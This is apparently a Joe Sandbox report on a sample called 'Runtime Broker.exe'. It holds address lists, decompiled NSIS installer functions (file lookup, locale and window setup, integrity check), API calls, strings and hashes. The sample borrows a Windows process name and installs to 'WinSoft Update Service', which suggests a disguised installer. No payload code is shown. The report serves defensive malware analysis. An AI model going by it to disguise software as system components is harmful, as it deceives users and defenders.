0x00406b05
0x00406b08
0x00406b0c
0x00000000
0x00000000
0x00406b12
0x00406b15
0x00406b17
0x00406b18
0x00406b1b
0x00406b1d
0x00406b1e
0x00406b20
0x00406b23
0x00406b28
0x00406b2d
0x00406b36
0x00406b49
0x00406b4c
0x00406b58
0x00406b80
0x00406b82
0x00406b90
0x00406b90
0x00406b94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b87
0x00406b88
0x00406b88
0x00000000
0x00406b84
0x00406b5e
0x00406b63
0x00406b63
0x00406b6c
0x00406b74
0x00406b77
0x00000000
0x00406b7d
0x00406b7d
0x00000000
0x00406b7d
0x00000000
0x00406b9a
0x00406b9a
0x00406b9e
0x0040744a
0x00000000
0x0040744a
0x00406ba7
0x00406bb7
0x00406bba
0x00406bbd
0x00406bbd
0x00406bbd
0x00406bc0
0x00406bc4
0x00000000
0x00000000
0x00406bc6
0x00406bcc
0x00406bf6
0x00406bfc
0x00406c03
0x00000000
0x00406c03
0x00406bd2
0x00406bd5
0x00406bda
0x00406bda
0x00406be5
0x00406bed
0x00406bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c35
0x00406c3b
0x00406c3e
0x00406c4b
0x00406c53
0x00000000
0x00000000
0x00406c0a
0x00406c0a
0x00406c0e
0x00407459
0x00000000
0x00407459
0x00406c1a
0x00406c25
0x00406c25
0x00406c25
0x00406c28
0x00406c2b
0x00406c2e
0x00406c33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406efa
0x00406efe
0x00406f1c
0x00406f1f
0x00406f26
0x00406f29
0x00406f2c
0x00406f2f
0x00406f32
0x00406f35
0x00406f37
0x00406f3e
0x00406f3f
0x00406f41
0x00406f44
0x00406f47
0x00406f4a
0x00406f4a
0x00406f4f
0x00000000
0x00406f4f
0x00406f00
0x00406f03
0x00406f06
0x00406f10
0x00000000
0x00000000
0x00406f64
0x00406f68
0x00406f8b
0x00406f8e
0x00406f91
0x00406f9b
0x00406f6a
0x00406f6a
0x00406f6d
0x00406f70
0x00406f73
0x00406f80
0x00406f83
0x00406f83
0x00000000
0x00000000
0x00406fa7
0x00406fab
0x00000000
0x00000000
0x00406fb1
0x00406fb5
0x00000000
0x00000000
0x00406fbb
0x00406fbd
0x00406fc1
0x00406fc1
0x00406fc4
0x00406fc8
0x00000000
0x00000000
0x00407018
0x0040701c
0x00407023
0x00407026
0x00407029
0x00407033
0x00000000
0x00407033
0x0040701e
0x00000000
0x00000000
0x0040703f
0x00407043
0x0040704a
0x0040704d
0x00407050
0x00407045
0x00407045
0x00407045
0x00407053
0x00407056
0x00407059
0x00407059
0x0040705c
0x0040705f
0x00407062
0x00407062
0x00407065
0x0040706c
0x00407071
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407103
0x004074a1
0x00000000
0x004074a1
0x00407109
0x0040710c
0x0040710f
0x00407113
0x00407116
0x0040711c
0x0040711e
0x0040711e
0x0040711e
0x00407121
0x00407124
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00406f52
0x00406f52
0x00406f55
0x00000000
0x00000000
0x00407291
0x00407295
0x004072b7
0x004072ba
0x004072c4
0x00000000
0x004072c4
0x00407297
0x0040729a
0x0040729e
0x004072a1
0x004072a1
0x004072a4
0x00000000
0x00000000
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00407385
0x00407385
0x00000000
0x00407385
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x004072a8
0x004072a8
0x004072ab
0x00000000
0x00000000
0x0040743f
0x00407442
0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c3
0x004073c7
0x00407427
0x0040742a
0x0040742f
0x00407430
0x00407432
0x00407434
0x00407437
0x00000000
0x00407437
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073e7
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407419
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00000000
0x0040728c
0x0040728a
0x004074bf
0x00000000
0x00000000
0x00406aee

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040689A(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004068a5
0x004068ae
0x00000000
0x004068bb
0x004068b1
0x00000000

APIs

FindFirstFileW.KERNELBASE(73BCFAA0,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 004068A5
FindClose.KERNEL32(00000000), ref: 004068B1

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC

Uniqueness

Uniqueness Score: -1.00%

Function 00403C0B, Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403C0B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a274;
				_t22 = E00406931(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040640A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E0040640A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406483(L"1033", _t73 & 0x0000ffff);
				}
				E00403EE1(_t78, _t90);
				_t86 = L"C:\\Program Files (x86)\\WinSoft Update Service";
				 *0x42a300 =  *0x42a27c & 0x00000020;
				 *0x42a31c = 0x10000;
				if(E00405F19(_t90, L"C:\\Program Files (x86)\\WinSoft Update Service") != 0) {
					L16:
					if(E00405F19(_t98, _t86) == 0) {
						E00406579(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EE1(_t78, __eflags);
							__eflags =  *0x42a320;
							if( *0x42a320 != 0) {
								_t33 = E00405677(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5);
							_t39 = E004068C1("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E004068C1("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E00403FB9, 0);
							E00403B5B(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E0040640A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a2b8 + _t78 * 2,  *0x42a2b8 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x6d
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405E3E(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653C(_t86, E00405E11(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E5D(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403c11
0x00403c1a
0x00403c21
0x00403c23
0x00403c37
0x00403c49
0x00403c52
0x00403c5b
0x00403c62
0x00403c67
0x00403c6e
0x00403c81
0x00403c81
0x00403c8c
0x00403c25
0x00403c25
0x00403c30
0x00403c30
0x00403c91
0x00403c9b
0x00403ca4
0x00403ca9
0x00403cba
0x00403d4c
0x00403d54
0x00403d5d
0x00403d5d
0x00403d73
0x00403d79
0x00403d87
0x00403e08
0x00403e10
0x00403e1a
0x00403e1f
0x00403e25
0x00403eaf
0x00403eb4
0x00403eb6
0x00403ed2
0x00000000
0x00403ed2
0x00403eb8
0x00403ebe
0x00403ec6
0x00403ec6
0x00000000
0x00403ebe
0x00403e33
0x00403e3e
0x00403e43
0x00403e45
0x00403e4c
0x00403e4c
0x00403e57
0x00403e5f
0x00403e61
0x00403e63
0x00403e6c
0x00403e6f
0x00403e75
0x00403e75
0x00403e94
0x00403ea5
0x00000000
0x00403eaa
0x00403e12
0x00403e14
0x00000000
0x00403d89
0x00403d89
0x00403d95
0x00403d9f
0x00403da5
0x00403daa
0x00403db9
0x00403ed7
0x00403ed7
0x00000000
0x00403ed7
0x00403dc8
0x00403e03
0x00000000
0x00403e03
0x00403cc0
0x00403cc0
0x00403cc3
0x00403cc5
0x00000000
0x00000000
0x00403cd3
0x00403ce5
0x00403cea
0x00403cf3
0x00000000
0x00000000
0x00403cf9
0x00403cfb
0x00403d08
0x00403d08
0x00403d11
0x00403d17
0x00403d3f
0x00403d47
0x00000000
0x00403d29
0x00403d2a
0x00403d33
0x00403d39
0x00403d3a
0x00000000
0x00403d3a
0x00403d35
0x00403d37
0x00000000
0x00000000
0x00000000
0x00403d37
0x00403d17

APIs

Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E

GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,00000000), ref: 00403C25

Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490

lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
lstrlenW.KERNEL32(markers.py,?,?,?,markers.py,00000000,C:\Program Files (x86)\WinSoft Update Service,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,73BCFAA0), ref: 00403D0C
lstrcmpiW.KERNEL32(?,.exe,markers.py,?,?,?,markers.py,00000000,C:\Program Files (x86)\WinSoft Update Service,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
GetFileAttributesW.KERNEL32(markers.py), ref: 00403D2A
LoadImageW.USER32 ref: 00403D73
RegisterClassW.USER32 ref: 00403DB0
SystemParametersInfoW.USER32 ref: 00403DC8
CreateWindowExW.USER32 ref: 00403DFD
ShowWindow.USER32(00000005,00000000), ref: 00403E33
GetClassInfoW.USER32 ref: 00403E5F
GetClassInfoW.USER32 ref: 00403E6C
RegisterClassW.USER32 ref: 00403E75
DialogBoxParamW.USER32 ref: 00403E94

Strings

1033, xrefs: 00403C2B, 00403C87
RichEdit, xrefs: 00403E66
Control Panel\Desktop\ResourceLocale, xrefs: 00403C3F
_Nb, xrefs: 00403D8F, 00403DF7
markers.py, xrefs: 00403CD3, 00403CDC, 00403CEA, 00403D39, 00403D3F
RichEdit20W, xrefs: 00403E57, 00403E5D
RichEd20, xrefs: 00403E39
H7B, xrefs: 00403C37
RichEd32, xrefs: 00403E47
.DEFAULT\Control Panel\International, xrefs: 00403C77
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C10
.exe, xrefs: 00403D19
"C:\Users\user\Desktop\Runtime Broker.exe" , xrefs: 00403C0F
C:\Program Files (x86)\WinSoft Update Service, xrefs: 00403C9B, 00403CA3, 00403D46, 00403D4C, 00403D5C

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Runtime Broker.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Program Files (x86)\WinSoft Update Service$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$markers.py
API String ID: 606308-4171113857
Opcode ID: 0b307520ca641d360a5c45cfd9714c8488050a479035ecdb86cfe50baa20a0e6
Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
Opcode Fuzzy Hash: 0b307520ca641d360a5c45cfd9714c8488050a479035ecdb86cfe50baa20a0e6
Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

Uniqueness

Uniqueness Score: -1.00%

Function 00403068, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00403068(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a270 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x438800, 0x400);
				_t106 = E00406032(0x438800, 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653C(L"C:\\Users\\jones\\Desktop", 0x438800);
				E0040653C(0x439000, E00405E5D(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402FC6(1);
					__eflags =  *0x42a278 - _t94;
					if( *0x42a278 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406A8C(0x40ce68);
						E00406061(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403590( *0x42a278 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403309(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a274 = _t111;
								 *0x42a27c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a280 =  *0x42a280 + 1;
									__eflags =  *0x42a280;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x1a4c3ed
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405FED(0x42a2a0, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403590( *0x420ef0);
					_t77 = E0040357A( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a278) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E0040357A(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402FC6(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a278;
						if( *0x42a278 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402FC6(0);
							}
							goto L20;
						}
						E00405FED( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x0
						 *0x42a320 =  *0x42a320 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a278 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x66c7
						if(__eflags < 0) {
							_v8 = E00406A1E(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403073
0x00403076
0x00403079
0x00403093
0x00403098
0x004030ab
0x004030b0
0x004030b6
0x00000000
0x004030b8
0x004030c9
0x004030da
0x004030e1
0x004030e7
0x004030e9
0x004030ee
0x004030f0
0x004031db
0x004031dd
0x004031e2
0x004031e9
0x00000000
0x00000000
0x004031ef
0x004031f2
0x0040321e
0x00403223
0x0040322e
0x00403230
0x00403241
0x0040325c
0x00403262
0x00403265
0x0040326a
0x00403289
0x00403299
0x004032ab
0x004032b0
0x004032b5
0x004032b8
0x004032c1
0x004032c5
0x004032cd
0x004032d2
0x004032d4
0x004032d4
0x004032d4
0x004032dc
0x004032dc
0x004032df
0x004032e0
0x004032e0
0x004032e3
0x004032e5
0x004032e5
0x004032e5
0x004032e8
0x004032ef
0x004032fb
0x00403300
0x00000000
0x00403300
0x00000000
0x004032b8
0x00000000
0x0040326c
0x004031fa
0x00403205
0x0040320a
0x0040320c
0x00000000
0x00000000
0x00403215
0x00403218
0x00000000
0x00000000
0x00000000
0x004030f6
0x004030fb
0x00403100
0x00403104
0x0040310b
0x00403110
0x00403112
0x00403114
0x00403114
0x00403118
0x0040311d
0x0040311f
0x00403278
0x004032ba
0x00000000
0x004032ba
0x00403125
0x0040312c
0x004031a8
0x004031ac
0x004031b0
0x004031b5
0x00000000
0x004031ac
0x00403135
0x0040313a
0x0040313d
0x00403142
0x00000000
0x00000000
0x00403144
0x0040314b
0x00000000
0x00000000
0x0040314d
0x00403154
0x00000000
0x00000000
0x00403156
0x0040315d
0x00000000
0x00000000
0x0040315f
0x00403166
0x00000000
0x00000000
0x00403168
0x0040316e
0x00403177
0x0040317d
0x00403180
0x00403182
0x00403188
0x00000000
0x00000000
0x0040318e
0x00403192
0x0040319a
0x0040319a
0x0040319d
0x004031a0
0x004031a2
0x004031a4
0x004031a4
0x00000000
0x004031a2
0x00403194
0x00403198
0x00000000
0x00000000
0x00000000
0x004031b6
0x004031b6
0x004031bc
0x004031c8
0x004031c8
0x004031cb
0x004031d1
0x004031d1
0x004031d1
0x004031d9
0x004031d9
0x00000000
0x004031d9

APIs

GetTickCount.KERNEL32 ref: 0040307C
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00403098

Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 004030E1
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
